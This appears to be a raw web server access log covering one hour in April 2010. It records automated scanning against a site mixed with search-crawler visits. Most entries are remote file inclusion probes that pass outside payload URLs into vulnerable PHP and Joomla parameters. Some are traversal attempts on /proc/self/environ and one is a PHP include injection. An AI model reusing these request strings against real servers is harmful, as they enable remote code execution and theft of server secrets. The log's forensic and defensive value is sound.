173.200.47.153 - - [20/Apr/2010:19:00:15 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:19:00:15 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:19:00:15 -0500] "GET /logs/access_log.1217548800/s_loadenv.inc.php?DOCUMENT_ROOT=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:19:00:19 -0500] "GET /logs/access_log.1217462400/s_loadenv.inc.php?DOCUMENT_ROOT=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:01:25 -0500] "GET /logs/access_log.1185840000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.104.170 - - [20/Apr/2010:19:02:10 -0500] "GET /logs/access_log.1219708800/?path%5Bdocroot%5D=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:02:42 -0500] "GET /logs/access_log.1251244800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
201.38.203.3 - - [20/Apr/2010:19:02:54 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
87.250.255.243 - - [20/Apr/2010:19:04:21 -0500] "GET /logs/access_log.1156896000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.241.177.123 - - [20/Apr/2010:19:06:53 -0500] "GET ///?custompluginfile%5B%5D=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
212.241.177.123 - - [20/Apr/2010:19:06:53 -0500] "GET /logs/access_log.1219708800///?custompluginfile%5B%5D=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.241.177.123 - - [20/Apr/2010:19:06:53 -0500] "GET /logs///?custompluginfile%5B%5D=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 200 2589 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:08:11 -0500] "GET /logs/access_log.1169251200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.241.177.123 - - [20/Apr/2010:19:08:15 -0500] "GET ///?custompluginfile%5B%5D=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
212.241.177.123 - - [20/Apr/2010:19:08:15 -0500] "GET /logs/access_log.1219708800///?custompluginfile%5B%5D=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.241.177.123 - - [20/Apr/2010:19:08:16 -0500] "GET /logs///?custompluginfile%5B%5D=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 200 2589 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:10:06 -0500] "GET /logs/access_log.1178150400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.163.227.186 - - [20/Apr/2010:19:10:56 -0500] "GET /logs/access_log.1264464000//delete_all.php?board_skin_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.163.227.186 - - [20/Apr/2010:19:10:56 -0500] "GET //delete_all.php?board_skin_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.163.227.186 - - [20/Apr/2010:19:10:56 -0500] "GET /logs//delete_all.php?board_skin_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:12:40 -0500] "GET /logs/access_log.1172361600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:19:14:35 -0500] "GET /logs/access_log.1232755200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.200.47.153 - - [20/Apr/2010:19:14:50 -0500] "GET /logs/access_log.1268870400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:15:54 -0500] "GET /logs/access_log.1197244800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.189 - - [20/Apr/2010:19:17:29 -0500] "GET /logs/access_log.1251849600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:19:18:28 -0500] "GET /logs/access_log.1182124800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:19:20:23 -0500] "GET /logs/access_log.1173139200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:19:21:39 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.72.194.58 - - [20/Apr/2010:19:22:16 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:19:22:16 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:19:22:16 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:24:12 -0500] "GET /logs/access_log.1194048000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.25.141.101 - - [20/Apr/2010:19:24:45 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.25.141.101 - - [20/Apr/2010:19:24:45 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
85.25.141.101 - - [20/Apr/2010:19:24:45 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:19:25:22 -0500] "GET /logs/access_log.1217462400%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:19:25:22 -0500] "GET /logs/access_log.1217548800%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:25:35 -0500] "GET /logs/access_log.1207958400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.12.234 - - [20/Apr/2010:19:26:52 -0500] "GET /logs/access_log.1268265600%20%20//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:26:52 -0500] "GET //main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:26:52 -0500] "GET /logs//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:26:54 -0500] "GET /logs/access_log.1163635200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
201.38.203.3 - - [20/Apr/2010:19:26:56 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
69.175.12.234 - - [20/Apr/2010:19:28:08 -0500] "GET //main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:28:08 -0500] "GET /logs//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:28:08 -0500] "GET /logs/access_log.1268265600%20%20//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:28:13 -0500] "GET //main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:28:13 -0500] "GET /logs//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:28:13 -0500] "GET /logs/access_log.1268265600%20%20//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:28:49 -0500] "GET /logs/access_log.1246924800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.12.234 - - [20/Apr/2010:19:31:22 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:31:22 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:31:22 -0500] "GET /logs/access_log.1219708800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:31:56 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:32:00 -0500] "GET /logs/access_log.1207353600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.25.141.101 - - [20/Apr/2010:19:33:47 -0500] "GET /logs/access_log.1268956800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:34:03 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:34:06 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:34:06 -0500] "GET /logs/access_log.1219708800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:34:06 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:34:10 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:34:18 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:34:18 -0500] "GET /logs/access_log.1219708800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:19:34:18 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:34:34 -0500] "GET /logs/access_log.1211500800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.127.70.39 - - [20/Apr/2010:19:34:58 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gonapus.net/chat2/user/xeika/1?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
75.127.70.39 - - [20/Apr/2010:19:34:58 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gonapus.net/chat2/user/xeika/1?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
75.127.70.39 - - [20/Apr/2010:19:34:58 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gonapus.net/chat2/user/xeika/1?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.127.70.39 - - [20/Apr/2010:19:35:41 -0500] "GET /logs/access_log.1268956800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gonapus.net/chat2/user/xeika/1?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:19:35:53 -0500] "GET /logs/access_log.1266364800//delete_all.php?board_skin_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:19:35:53 -0500] "GET /logs/access_log.1264464000//delete_all.php?board_skin_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:19:35:53 -0500] "GET /logs//delete_all.php?board_skin_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:19:35:53 -0500] "GET //delete_all.php?board_skin_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:19:36:55 -0500] "GET /logs/access_log.1268956800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:37:07 -0500] "GET /logs/access_log.1157068800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
201.38.203.3 - - [20/Apr/2010:19:37:32 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
201.38.203.3 - - [20/Apr/2010:19:37:38 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
87.250.255.243 - - [20/Apr/2010:19:38:24 -0500] "GET /logs/access_log.1266192000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.30.111 - - [20/Apr/2010:19:38:39 -0500] "GET /logs/!ijoscan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.803"
91.121.30.111 - - [20/Apr/2010:19:38:39 -0500] "GET /!ijoscan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.803"
74.86.210.130 - - [20/Apr/2010:19:39:14 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.86.210.130 - - [20/Apr/2010:19:39:14 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.86.210.130 - - [20/Apr/2010:19:39:14 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
91.121.30.111 - - [20/Apr/2010:19:39:54 -0500] "GET /!ijoscan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.803"
91.121.30.111 - - [20/Apr/2010:19:40:07 -0500] "GET /logs/access_log.1268611200/!ijoscan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 381 "-""libwww-perl/5.803"
91.121.30.111 - - [20/Apr/2010:19:40:07 -0500] "GET /!ijoscan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.803"
91.121.30.111 - - [20/Apr/2010:19:40:08 -0500] "GET /logs/!ijoscan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.803"
217.168.155.50 - - [20/Apr/2010:19:40:21 -0500] "GET /logs/access_log.1212969600%20%20/?path%5Bdocroot%5D=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:40:21 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.86.210.130 - - [20/Apr/2010:19:40:57 -0500] "GET /logs/access_log.1219363200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
217.168.155.50 - - [20/Apr/2010:19:41:12 -0500] "GET /logs/access_log.1219708800%20%20/?path%5Bdocroot%5D=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:42:55 -0500] "GET /logs/access_log.1164499200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.25.141.101 - - [20/Apr/2010:19:43:01 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
217.168.155.50 - - [20/Apr/2010:19:44:06 -0500] "GET /logs/access_log.1212969600%20%20/?path%5Bdocroot%5D=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.46.42.233 - - [20/Apr/2010:19:44:13 -0500] "GET /logs/access_log.1223856000/?sourcedir=http://fuerzarh.com//appserv/.logs?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.46.42.233 - - [20/Apr/2010:19:44:13 -0500] "GET /?sourcedir=http://fuerzarh.com//appserv/.logs?? HTTP/1.1" 200 1003 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.46.42.233 - - [20/Apr/2010:19:44:13 -0500] "GET /logs/?sourcedir=http://fuerzarh.com//appserv/.logs?? HTTP/1.1" 200 2583 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
87.250.255.243 - - [20/Apr/2010:19:44:50 -0500] "GET /logs/access_log.1211414400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.168.155.50 - - [20/Apr/2010:19:44:55 -0500] "GET /logs/access_log.1219708800%20%20/?path%5Bdocroot%5D=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:19:45:40 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:46:07 -0500] "GET /logs/access_log.1196121600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.124.120.5 - - [20/Apr/2010:19:48:21 -0500] "GET /logs/access_log.1219276800//index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:48:21 -0500] "GET /logs//index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:48:21 -0500] "GET //index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:48:40 -0500] "GET /logs/access_log.1207699200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
201.38.203.3 - - [20/Apr/2010:19:48:53 -0500] "GET /logs/access_log.1268265600//index1.php?site=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
201.38.203.3 - - [20/Apr/2010:19:48:58 -0500] "GET //index1.php?site=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
201.38.203.3 - - [20/Apr/2010:19:49:02 -0500] "GET /logs//index1.php?site=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
69.72.194.58 - - [20/Apr/2010:19:49:12 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:19:49:12 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:19:49:13 -0500] "GET /logs/access_log.1220054400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:50:35 -0500] "GET /logs/access_log.1194220800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.124.120.5 - - [20/Apr/2010:19:51:43 -0500] "GET /logs//index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:51:43 -0500] "GET //index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:51:43 -0500] "GET /logs/access_log.1212969600%20%20//index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:51:44 -0500] "GET //index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:51:44 -0500] "GET /logs//index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:51:44 -0500] "GET /logs/access_log.1212969600%20%20//index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:19:51:48 -0500] "GET //administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:19:51:48 -0500] "GET /logs//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:19:51:48 -0500] "GET /logs/access_log.1270684800//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:51:52 -0500] "GET //index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:51:52 -0500] "GET /logs//index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.124.120.5 - - [20/Apr/2010:19:51:54 -0500] "GET /logs/access_log.1212969600//index.php?option=com_juser&Itemid=&mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:51:54 -0500] "GET /logs/access_log.1203120000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.200.47.153 - - [20/Apr/2010:19:52:30 -0500] "GET /logs/access_log.1217462400%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:19:52:35 -0500] "GET /logs/access_log.1217548800%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.141.56.136 - - [20/Apr/2010:19:53:03 -0500] "GET /logs//administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
62.141.56.136 - - [20/Apr/2010:19:53:03 -0500] "GET //administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
62.141.56.136 - - [20/Apr/2010:19:53:03 -0500] "GET /logs/access_log.1266364800//administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:19:54:27 -0500] "GET /logs/access_log.1157760000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:19:55:11 -0500] "GET /logs/access_log.1225238400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.38.203.3 - - [20/Apr/2010:19:56:43 -0500] "GET /logs/access_log.1271030400//index1.php?site=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
87.250.255.243 - - [20/Apr/2010:19:57:00 -0500] "GET /logs/access_log.1237593600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:19:57:54 -0500] "GET /logs/access_log.1223424000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:19:58:17 -0500] "GET /logs/access_log.1248652800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
119.63.193.56 - - [20/Apr/2010:19:58:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
